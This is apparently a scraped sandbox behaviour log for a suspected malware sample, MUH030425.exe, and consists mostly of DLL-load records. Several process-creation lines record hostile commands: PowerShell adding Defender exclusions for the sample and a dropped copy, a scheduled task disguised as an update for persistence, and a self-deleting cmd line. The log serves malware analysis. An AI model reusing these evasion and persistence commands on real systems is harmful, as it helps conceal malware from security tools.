Source: unknown | Process created: C:\Windows\System32\snmptrap.exe C:\Windows\System32\snmptrap.exe
Source: unknown | Process created: C:\Windows\System32\Spectrum.exe C:\Windows\system32\spectrum.exe
Source: unknown | Process created: C:\Windows\System32\OpenSSH\ssh-agent.exe C:\Windows\System32\OpenSSH\ssh-agent.exe
Source: unknown | Process created: C:\Windows\System32\TieringEngineService.exe C:\Windows\system32\TieringEngineService.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown | Process created: C:\Windows\System32\AgentService.exe C:\Windows\system32\AgentService.exe
Source: unknown | Process created: C:\Windows\System32\vds.exe C:\Windows\System32\vds.exe
Source: unknown | Process created: C:\Windows\System32\wbengine.exe "C:\Windows\system32\wbengine.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "RegSvcs.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3
Source: C:\Users\user\Desktop\MUH030425.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MUH030425.exe"
Source: C:\Users\user\Desktop\MUH030425.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wBBaygjR.exe"
Source: C:\Users\user\Desktop\MUH030425.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wBBaygjR" /XML "C:\Users\user\AppData\Local\Temp\tmpD1E0.tmp"
Source: C:\Users\user\Desktop\MUH030425.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "RegSvcs.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3
Source: C:\Users\user\Desktop\MUH030425.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\MUH030425.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\MUH030425.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\MUH030425.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\MUH030425.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\MUH030425.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\MUH030425.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\MUH030425.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\MUH030425.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\MUH030425.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\MUH030425.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\MUH030425.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\MUH030425.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\MUH030425.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\MUH030425.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\MUH030425.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\MUH030425.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\MUH030425.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\MUH030425.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\MUH030425.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\MUH030425.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\MUH030425.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\MUH030425.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\MUH030425.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\MUH030425.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\MUH030425.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\MUH030425.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\MUH030425.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\MUH030425.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\MUH030425.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\MUH030425.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\MUH030425.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\MUH030425.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\MUH030425.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\alg.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\alg.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\alg.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\alg.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\alg.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\alg.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\alg.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\alg.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\alg.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\alg.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\alg.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\alg.exeSection loaded: webio.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\alg.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: drprov.dll
              Source: C:\Windows\System32\alg.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ntlanman.dll
              Source: C:\Windows\System32\alg.exeSection loaded: davclnt.dll
              Source: C:\Windows\System32\alg.exeSection loaded: davhlpr.dll
              Source: C:\Windows\System32\alg.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\alg.exeSection loaded: cscapi.dll
              Source: C:\Windows\System32\alg.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\alg.exeSection loaded: browcli.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\AppVClient.exeSection loaded: appvpolicy.dll
              Source: C:\Windows\System32\AppVClient.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\AppVClient.exeSection loaded: wtsapi32.dll
              Source: C:\Windows\System32\AppVClient.exeSection loaded: netapi32.dll
              Source: C:\Windows\System32\AppVClient.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\AppVClient.exeSection loaded: wininet.dll
              Source: C:\Windows\System32\AppVClient.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\AppVClient.exeSection loaded: samcli.dll
              Source: C:\Windows\System32\AppVClient.exeSection loaded: logoncli.dll
              Source: C:\Windows\System32\AppVClient.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\AppVClient.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\AppVClient.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\AppVClient.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\AppVClient.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\AppVClient.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\AppVClient.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\AppVClient.exeSection loaded: appmanagementconfiguration.dll
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeSection loaded: amsi.dll
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeSection loaded: msasn1.dll
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeSection loaded: gpapi.dll
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeSection loaded: windowscodecs.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: version.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: tapi32.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: credui.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: fxstiff.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: fxsresm.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: ualapi.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dll
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dll
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: dbghelp.dll
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: winhttp.dll
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: mpr.dll
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: secur32.dll
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: sspicli.dll
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: dnsapi.dll
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: iphlpapi.dll
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: ntmarta.dll
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: version.dll
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: msasn1.dll
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: winhttp.dll
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: mpr.dll
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: secur32.dll
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: sspicli.dll
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: dnsapi.dll
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: iphlpapi.dll
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: ntmarta.dll
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: msdtctm.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: msdtcprx.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: msdtclog.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: mtxclu.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: winmm.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: clusapi.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: xolehlp.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: mtxclu.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: ktmw32.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: clusapi.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: resutils.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: clusapi.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: resutils.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: winhttp.dll
